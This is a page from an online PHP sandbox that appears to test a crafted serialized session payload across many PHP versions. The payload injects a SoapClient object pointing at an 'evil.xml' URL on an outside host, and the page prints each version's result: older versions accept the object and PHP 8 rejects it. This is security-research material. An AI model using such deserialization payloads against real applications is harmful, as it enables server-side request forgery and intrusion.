3v4l.org

run code in 300+ PHP versions simultaneously
<?php session_start(); session_decode('test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}'); var_dump($_SESSION);
Output for 8.0.0 - 8.0.30, 8.1.0 - 8.1.29, 8.2.0 - 8.2.21, 8.3.0 - 8.3.9
Warning: session_decode(): Failed to decode session object. Session has been destroyed in /in/ujk9b on line 5 Fatal error: Uncaught TypeError: Cannot assign __PHP_Incomplete_Class to property Exception::$previous of type ?Throwable in /in/ujk9b:5 Stack trace: #0 /in/ujk9b(5): session_decode('test|O:9:"Excep...') #1 {main} thrown in /in/ujk9b on line 5
Process exited with code 255.
Output for 5.6.28, 7.0.20, 7.1.0 - 7.1.25, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.0 - 7.4.33
array(1) { ["test"]=> object(Exception)#1 (6) { ["message":protected]=> string(0) "" ["string":"Exception":private]=> string(0) "" ["code":protected]=> int(0) ["file":protected]=> string(9) "/in/ujk9b" ["line":protected]=> int(5) ["trace":"Exception":private]=> array(1) { [0]=> array(4) { ["file"]=> string(9) "/in/ujk9b" ["line"]=> int(5) ["function"]=> string(14) "session_decode" ["args"]=> array(1) { [0]=> string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}" } } } } }
Output for 5.5.0 - 5.5.38, 5.6.0 - 5.6.25, 7.0.0 - 7.0.10
array(1) { ["test"]=> object(Exception)#1 (7) { ["message":protected]=> string(0) "" ["string":"Exception":private]=> string(0) "" ["code":protected]=> int(0) ["file":protected]=> string(9) "/in/ujk9b" ["line":protected]=> int(5) ["trace":"Exception":private]=> array(1) { [0]=> array(4) { ["file"]=> string(9) "/in/ujk9b" ["line"]=> int(5) ["function"]=> string(14) "session_decode" ["args"]=> array(1) { [0]=> string(178) "test|O:9:"Exception":1:{S:19:"\00Exception\00previous";O:10:"SoapClient":3:{S:3:"uri";S:0:"";S:8:"location";S:35:"http://karmainsecurity.com/evil.xml";S:13:"_soap_version";i:1;}}" } } } ["previous":"Exception":private]=> object(__PHP_Incomplete_Class)#2 (4) { ["__PHP_Incomplete_Class_Name"]=> string(10) "SoapClient" ["uri"]=> string(0) "" ["location"]=> string(35) "http://karmainsecurity.com/evil.xml" ["_soap_version"]=> int(1) } } }

preferences:
197.52 ms | 405 KiB | 247 Q